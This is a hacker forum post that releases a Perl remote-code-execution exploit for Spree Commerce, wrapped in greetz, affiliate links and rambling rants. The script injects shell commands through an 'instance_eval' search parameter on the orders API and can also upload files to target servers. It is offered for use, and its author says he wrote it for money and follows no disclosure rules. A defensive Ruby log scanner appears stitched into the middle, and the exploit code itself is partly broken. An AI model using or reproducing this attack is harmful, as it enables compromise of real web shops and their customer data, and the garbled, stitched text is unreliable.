Well, since it is only a few months old now, and we don't agree on things like automating the scanner to *auto root* etc., BUT we did make it so it can run with either infile (IP list) and, then th, it will kinda not be ready to make autorooting.. but I guess this is a BIG ass bug, yes..
#!/usr/bin/perl -w
# 01-21-2012
# Spreetime (r00t time) RCE exploit coded by
# xd / HaqNET (#Haxnet@EFNET) and peanuter / darpanet (#darpa@irc.darpanet.org)
##Spree Commerce Remote Code execution exploit and Options~
# greetz: to those who deserve them, all my friends
# from haxnet... the goods ones
#Greets: ac1db1tch3z <3 , all the hackerz on efnet, my channel specially, and the cool dudes and @ps in it,
#Mouse_ , Cypher- , bysin , l3th4l (smashthestack.org), Jason/zx2c4 , killerw0rm , bakO , 2Dcube , gaby, ALL
# albanian hax0rs! love yas! and evey biker around the net, hey, yea, we have some prescence here now!
#Yes ofcourse it is for money! what else would i be sittin here writin this sht for! cmon mate..
#and, even old notprix,the magician who appears, talks abit of bs, then disapears! hha joking mate..
#I could not fit all the people really, there is to many, but, ofcourse the companys who help me to, Host Virtual
#Hosting 2 of my VPS, both in AWESOME EU countries where the standard is 100mbit and, it goes upto and into 400gig/s! Nice damn backbone and love the suppt.
# My affiliation there, would help you greatly: http://www.vr.org/aff.php?aff=551
#Also great box with Gtcomm: GloboTech Communications:
#www.gtcomm.net , USE Referral ID 5039 ,and basically helps me, and, you can even then be added faster, as usually are coming through a trusted/verified user,
#i dont know howmuch it really matters,but atleast shows them you have seen and, watched theyre ad or just been told, like this yes, ina fucking exploit!
# and 3 to fahmad / server4sale ,for his help with, and donated Dedicated box, wich is a Staminus one and, rather nice, i mean, this is one NICE guy with a huge
# heart, and, i admire him.. also LordNikon, i admire also, when he would stop changing his midn that is :s
#Now, ill let you to go have some phucking phun eh?
#thx to r0x0rel for pointing out the bugz in the first copy and ofc to the rest of haxnet....cheers!
# UNITED WE STAND, AONE , WE FALL! Yes, it is not worded the right way, thats coz, i like to be owiginwal.
#On behalf of the deceased/zombies and vampires, i think usa is now ready to tackle you guys! be careful now, your trolling for brain matter!
#peace to everyone, who i have pissed off lately..and, hopefully, you guys and i can just, chat things out and be done with the ctrap..seriously, i dont need it..and,
#i usually dont like to hand out exploit code like THiS ,but, i guess why not.. it was, there anyhow..
#To ALL troops stationed in afghanistan,pakistan,wherver other mitia advantageous points, well, go home. seriously, your fighting a war you simply will NOT win.
#Sorry that, the shitty governemts, have, been so, great with this, i mean sending mentally sound mass murdereng seargents in, is not theyre best move :s
#unfortunately for those living there, thats life...and, i can nly wish, that everyone is, at peace... or, atleast stoned ok?
#Now, it is time for my injections.. ak im late...see what happens >?
# XD coz BITCH IM WORLDIWDE
use strict;
use warnings;
use IO::Socket::INET;
use Getopt::Std;
use Storable;
getopt('cfdthlg'); ## here is the options.. you CAN remove thi, and set it to JUST scan single ip or,
## add in the scanning for/per subnet..and should be easy as! Ask ZmeU ,hes pretty cool wit that stuff! (GREETZ!)
sub Usage {
print "perl $0:\n"
print "These are your Options:\n"
. " -c Command - Issues command with parameters ..\n"
. " -f Filename - Uploads file to dir .. (/tmp by default) ..\n"
. " -d Directory - Specify dir to upload file to .. (/tmp by default) ..\n"
. " -t Target - Ip Address or Hostname/Domain\n" ## hence,we decided using this method.is very easy to add www-mechanize here.and maybe
##GOOD ForkManager for it,also a subnet setup,also it can scan -a/-b/-c if added in codeit..
. " -l Load [Load Pre-Compiled Command List using -g]\n"
. " -g Generate [Generate Pre-Compiled Command List]\n"
. " -h Help\n"
. "/t/t_-*Another HaqNET / Darpanet Production*-_";
exit(0);
}
our ( $opt_c, $opt_f, $opt_d, $opt_t, $opt_h, $opt_l, $opt_g );
Usage() unless $opt_c and $opt_t or $opt_f and $opt_t or $opt_l and $opt_t or $opt_g;
#Generate Pre-Compiled Command List (ie in file put uname -a ; id) etc..
if ($opt_g) {
print "-> What would you like to name the commands file: ";
my $filename = <STDIN>;
chomp $filename;
my ($command, @command, $command2);
while () {
print "-> Enter command(s) [done to finish]: ";
my $command2;
$command2 = <STDIN>;
chomp($command2);
if ($command2 =~ /done/) {
last;
}
my $command .= $command2;
}
my $commands = {
'commands' => [ @command ],
};
store(\$commands, $filename);
exit(0);
}
#Single command issue
if ($opt_c) {
#get command from console
my $cmd = $opt_c;
my $issue = 'cmd';
#send command to Build_Buffer
my $buffer = Build_Buffer( $issue, $cmd );
#send attack to socket
attack($issue, $buffer);
}
#Single File Upload
if ($opt_f) {
open( File, " < $opt_f " )
or die(" [-] Unable to open (ie: file.pl you just added to it): $opt_f\nError : $1 ");
my @file = <File>;
chomp @file;
foreach my $line (@file) {
my $issue = 'file';
#send line to Build_Buffer
Build_Buffer( $issue, $line );
}
}
#Stored Command List
if ($opt_l) {
my $Stored_Commands = retrieve("$opt_l");
foreach my $line ($Stored_Commands->commands) {
my $issue = 'commands';
#send commands to Build_Buffer
Build_Buffer( $issue, $line );
}
}
sub Build_Buffer {
my ($cmd_or_file, $line) = @_;
$line =~ s/\s/\%20/;
my $payload = undef;
#design payload
if ( $cmd_or_file =~ /cmd/ ) {
my $payload =
'/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. $line
. '%60end';
}
if ( $cmd_or_file =~ /file/) {
if ( $opt_d ) {
my $directory = $opt_d;
} else {
my $directory = '/tmp/';
#my $directory2 = '/proc/self/environ/; ## this is where id be headed
}
my $directory; #annoying strict issue ;\
my $payload = '/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. 'echo%20'
. $line
. '>>'
. $directory
. "/"
. $opt_f
. "%60end";
}
if ( $cmd_or_file =~ /commands/ ) {
my $payload = '/api/orders.json?search[instance_eval'
. ']=Kernel.fork%20do%60'
. $line
. '%60end';
}
my $payload_length = length($payload);
my $host = $opt_t;
#create request
my $buffer =
'POST / HTTP/1.1' . "\n" .
'Host: $host' . "\n" .
'Keep-Alive: 300' . "\n" .
'Connection: Close' . "\n" .
'Referer: XD' . "\n" .
'Cookie: sid=1; testing=1;' . "\n" .
'Content-Type: plain/text' . "\n" .
'Length: ' . $payload_length . "\n\n" .
"$payload\n\n";
#send attack to socket
if ($cmd_or_file =~ /cmd/) {
return ($buffer);
}
if ($cmd_or_file =~ /file/) {
attack($cmd_or_file, $buffer);
}
if ($cmd_or_file =~ /commands/) {
attack($cmd_or_file, $buffer);
}
}
sub attack {
my ($cmd_or_file, $buffer) = @_;
my $host = $opt_t;
print " [+] Connecting to: $host\n ";
my $sock = IO::Socket::INET->new(
Proto => 'tcp',
PeerAddr => $host,
PeerPort => 80,
Timeout => 15
) or die(" [-] Unable to connect to: $host\nError : $! ");
if ($sock) {
print $sock $buffer;
print " [+] Buffer sent .. running our command .. \n ";
}
if ($cmd_or_file =~ /cmd/) {
while ( my $responce = $sock ) {
print "[!+!] Reply from: $host\n ";
print $responce;
}
exit(0);
}
}
About the exploit.. there are actually a couple of them, and there is this one, which can execute code nicely on pretty much any version, I think.. I am sure it might be patched now, but unsure which versions/IS, and other bundled software that uses Spree Commerce ( www.spreecommerce.com ).
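For defenders checking web logs, the request shape the script builds (a `search[instance_eval]` key on `/api/orders.json`) can be caught by allowlisting the search keys the API is expected to receive. This is an added example, not part of the original post or of Spree; the allowlisted key names and the sample log lines are assumptions constructed for illustration.

```ruby
require 'uri'

# Assumption: search fields this shop's API clients legitimately use (hypothetical names).
ALLOWED_SEARCH_KEYS = %w[number_eq email_contains state_eq].freeze

# Request target from a combined-log-format line.
REQUEST_RE = %r{"(?:GET|POST|PUT|DELETE|HEAD) (\S+) HTTP/[\d.]+"}

# Return the search[...] keys in an /api/ request target that are not allowlisted.
def unexpected_search_keys(target)
  path, query = target.split('?', 2)
  return [] unless query && path.start_with?('/api/')

  query.split(/[&;]/).map do |pair|
    raw_key = pair.split('=', 2).first.to_s
    key = begin
      URI.decode_www_form_component(raw_key) # brackets may arrive as %5B / %5D
    rescue ArgumentError
      # Malformed escape elsewhere in the key: still normalise the brackets.
      raw_key.gsub(/%5b/i, '[').gsub(/%5d/i, ']')
    end
    m = key.match(/\Asearch\[([^\]]*)\]/)
    m[1] if m && !ALLOWED_SEARCH_KEYS.include?(m[1])
  end.compact
end

# Scan log lines; return [line_number, client_ip, keys] for every hit.
def scan_log(lines)
  lines.each_with_index.map do |line, i|
    m = REQUEST_RE.match(line)
    next unless m
    keys = unexpected_search_keys(m[1])
    [i + 1, line.split(' ', 2).first, keys] unless keys.empty?
  end.compact
end

# Constructed sample lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
  '198.51.100.7 - - [21/Jan/2012:10:00:01 +0000] "GET /api/orders.json?search[number_eq]=R123 HTTP/1.1" 200 512',
  '192.0.2.10 - - [21/Jan/2012:10:00:05 +0000] "GET /api/orders.json?search[instance_eval]=PLACEHOLDER HTTP/1.1" 200 2',
  '192.0.2.10 - - [21/Jan/2012:10:00:09 +0000] "GET /api/orders.json?search%5Binstance_eval%5D=PLACEHOLDER HTTP/1.1" 200 2',
  '198.51.100.7 - - [21/Jan/2012:10:01:00 +0000] "GET /products HTTP/1.1" 200 9000'
].freeze

scan_log(SAMPLE_LOG).each do |n, ip, keys|
  puts "line #{n}: #{ip} sent unexpected search key(s): #{keys.join(', ')}"
end
```

An allowlist flags any unexpected key, not only the one named on this page, and the decode step catches the percent-encoded bracket form that a plain substring match would miss.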
We did agree (me and peanuter, that is) not to make it auto root, and this was fine with me and him, so, for those who CAN read, it is not hard at all to port anything for this, and peanuter did a fine job of recoding it.. I have another bug, you could say, which exists on the same page of code this bug is on.. and since this is not a disclosure like normal ones, well hell… we don't have to follow ANY rules.
So what happened.. why did it happen, so that it was NOT disclosed.. OK, that's easy.. I made this bug PoC about 6 months ago, I don't know if I was ted or what… anyhow, I used to keep ownage.pastebin.com (before they stopped subdomaining it), and well, thus was born the spree.pl. In this time, a member from my efnet network channel #HaxNET had tried to run it, and there was one brace too many! Well, shit on me… anyhow, I fixed it up for him, but then realised we had much more talented members than me in my channel for Perl =) That's a no-brainer.. but I was NOT expecting it to be this guy.. hehehe, but I welcomed peanuter's suggestions, and he was nice about things, and asked to *properly* do it.. so it went through a couple of different versions, and I know different attacks were tested on my end for multiple vulnerabilities… anyhow, I could not figure out if it was patched or not, and by this time it had sat on ownage. for about months, and was very easy to see, apparently :s
Anyhow, that kinda killed the chance of trying to keep it quiet.. but before it ended up on exploitdb or some other silly archive site, I'd rather showcase it and the talent which went into a small, yet VERY nicely coded exploit. I only take credit for a little of this now, as it did undergo some changes, and it has multiple attack vectors, but maybe you can poke around, eh? It ain't so bad… only a bit of php to readdd…
Anyhow, I like my friends, and I like them to stay LOYAL, and I don't see this too much nowadays.. I hope, by even releasing this to people, they can see that even after *fights* with others, there can be full peace, and even a deeper understanding of the human psyche.
The Internet NOW, it is truly a place for geniuses, and well, I know I am not one, but my IQ is not that of a pea, either.
hehe… anyhow, be brave and fight the good fight!
Don't let fatassed burger eatin ppl annoy ya!~ Actually, make that anyone… but, you know, my theme always has been NO THUGGERY ONLINE! Still this is my belief, but I also believe everyone has good inside them, and this should always be looked at FIRST.
I hope you find inner peace, just like the Dalai Lama, and then you even get to smoke weed, free! Ha! See, who said peace was bad… make a cult, get 10 wives, and shit, have a bigotting damn good time!
Now as for me, I have to doin-time.in, so I might not be around so much… but I will be sure to look after those who looked after me when it was needed, and for those who did NOT remain loyal.. well, you should really try and make peace, and stop even tensions… and I mean this.. I mean one special person, from USA.. and I hope that he can understand why I am who I am, and that's just a damn old man on the keys! hehe I'm 37, not 7, so I don't see things as clear as some younger people.. but damn, I see bad and good when I need to, and I try always to find that good nowadays, and yea… sure it was a while b4 I could act or be nice to anyone.. but now it seems normal for me to rant on like now and feel GOOD about it, because even if I make ONE person smile, it has made my day…
Enjoy!
XD / worldwide